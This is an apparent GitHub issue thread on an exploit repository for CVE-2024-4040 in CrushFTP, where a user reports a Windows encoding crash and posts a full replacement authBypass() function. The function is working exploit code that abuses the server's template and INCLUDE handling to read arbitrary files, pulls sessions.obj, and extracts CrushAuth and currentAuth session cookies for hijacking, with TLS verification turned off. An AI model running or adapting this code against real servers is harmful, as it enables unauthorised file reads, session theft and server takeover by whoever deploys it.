
CVE-2024-4040 CrushFTP SSTI LFI & Auth Bypass | Full Server Takeover | Wordlist Support

codec error \ufffd #3

Open Hina-kari opened 5 months ago

Hina-kari commented 5 months ago

Traceback (most recent call last): File "C:\Users\PC\Downloads\crushed.py", line 267, in main() File "C:\Users\PC\Downloads\crushed.py", line 260, in main extracted_crush_auth, extracted_current_auth = authBypass(target=args.target, crush_auth_cookie=crush_auth_cookie, current_auth_cookie=current_auth_cookie, lfi=args.lfi, session=session) ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^ File "C:\Users\PC\Downloads\crushed.py", line 167, in authBypass f.write(response.text) File "C:\Program Files\WindowsApps\PythonSoftwareFoundation.Python.3.12_3.12.1008.0_x64__qbz5n2kfra8p0\Lib\encodings\cp1252.py", line 19, in encode return codecs.charmap_encode(input,self.errors,encoding_table)[0] ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^ UnicodeEncodeError: 'charmap' codec can't encode character '\ufffd' in position 790: character maps to

Hina-kari commented 5 months ago

fixed the error

replace authbypass() with this `def authBypass(target, crush_auth_cookie, current_auth_cookie, session, lfi=None):
    """Issue the two PoC requests and return cookie values found in the fetched file.

    Args:
        target: base URL of the server; used verbatim to build both request URLs.
        crush_auth_cookie: value sent as the ``CrushAuth`` cookie.
        current_auth_cookie: value sent as the ``currentAuth`` cookie and as the
            ``c2f`` query parameter.
        session: ``requests``-style session whose ``post`` is called twice.
        lfi: optional path to fetch instead of ``<install_dir>sessions.obj``.

    Returns:
        ``(crush_auth_list, current_auth_list)`` when the default file was read,
        ``(None, None)`` when the second request failed, and a bare ``None`` when
        no ``file:`` match was found (see the review note below). Falls off the end
        (implicit ``None``) when the first response is not HTTP 200 with a body.

    Side effects:
        Prints progress to ``console``, writes the fetched file to ``sessions.obj``
        in the current working directory, and calls ``exit(1)`` on a non-vulnerable
        response or a request error.
    """

    console.print(f"[green][*][/green] Attempting to bypass authentication...")

    url = f"{target}/WebInterface/function/?c2f={current_auth_cookie}&command=zip&path={{working_dir}}&names=/a"
    console.print(f"\n[green][+][/green] URL: " + url)
    headers = {
        "Cookie": f"CrushAuth={crush_auth_cookie}; currentAuth={current_auth_cookie}"
    }

    try:
        # NOTE(review): verify=False disables TLS certificate validation for both requests.
        response = session.post(url, headers=headers, verify=False, allow_redirects=True)

        # The literal placeholder surviving in the body means the server left it unexpanded.
        if "{working_dir}" in response.text:
            console.print(f"[red][-][/red] Bypass was not successful, server is not vulnerable.")
            console.print(f"[red][-][/red] Response: " + response.text)
            exit(1)

        if response.status_code == 200 and response.text != "":
            console.print(f"[green][+][/green] Extracted response: \n" + response.text)

            # ET.fromstring raises ParseError if the body is not XML; that is not caught below.
            root = ET.fromstring(response.text)
            response_text = root.find('response').text
            matches = re.findall(r'file:(.*?)(?=\n|$)', response_text)            
            if matches:
                # Last match wins; the path is used as a prefix, so it is assumed to end in a separator.
                install_dir = matches[-1].strip()
                console.print(f"[green][+][/green] Installation directory of CrushFTP: " + install_dir)
                file_to_read = lfi if lfi else f"{install_dir}sessions.obj"
                console.print(f"[green][+][/green] File to read: " + file_to_read)

                url = f"{target}/WebInterface/function/?c2f={current_auth_cookie}&command=zip&path=<INCLUDE>{file_to_read}</INCLUDE>&names=/a"
                console.print(f"\n[green][+][/green] Attempting to extract {file_to_read}...")
                console.print(f"\n[green][+][/green] URL: " + url)
                response = session.post(url, headers=headers, verify=False, allow_redirects=True)

                if response.status_code == 200 and response.text != "":
                    console.print(f"[green][+][/green] Successfully extracted {file_to_read}")
                    # Square brackets are escaped so rich does not interpret file contents as markup.
                    escaped_text = response.text.replace("[", "\\[").replace("]", "\\]")

                    console.print(f"[green][+][/green] Extracted response: \n" + escaped_text)
                    if not lfi or lfi == f"{install_dir}sessions.obj":
                        # Values are truncated to fixed lengths (44 and 4 characters).
                        extracted_crush_auth = [cookie[:44] for cookie in re.findall(r'CrushAuth=([^;]*)', response.text)]
                        extracted_current_auth = [cookie[:4] for cookie in re.findall(r'currentAuth=([^;]*)', response.text)]

                        console.print(f"\n[green][+][/green] Extracted cookies from {file_to_read}: ")
                        console.print(f"\n[green][+][/green] [yellow2]CrushAuth cookies:[/yellow2] " + ', '.join(extracted_crush_auth))
                        console.print(f"\n[green][+][/green] [yellow2]currentAuth cookies: [/yellow2]" + ', '.join(extracted_current_auth))
                        # encoding="utf-8" is the fix this issue reports: with the platform default
                        # codec (cp1252 on Windows) writing U+FFFD raised UnicodeEncodeError.
                        with open (f"sessions.obj", "w", encoding="utf-8") as f:
                            f.write(response.text)
                        return extracted_crush_auth, extracted_current_auth
                return None, None
            else:
                # NOTE(review): plain print() leaves the rich markup tags literal, and the single
                # None here cannot be unpacked by the caller, which expects a 2-tuple.
                print(f"[red][-][/red] Failed to extract file value")
                return None

    except requests.exceptions.RequestException as e:
        console.print(f"[red][-][/red] Failed to bypass authentication")
        console.print(f"[red][-][/red] Error: " + str(e))
        exit(1)`

changed the file encoding to UTF-8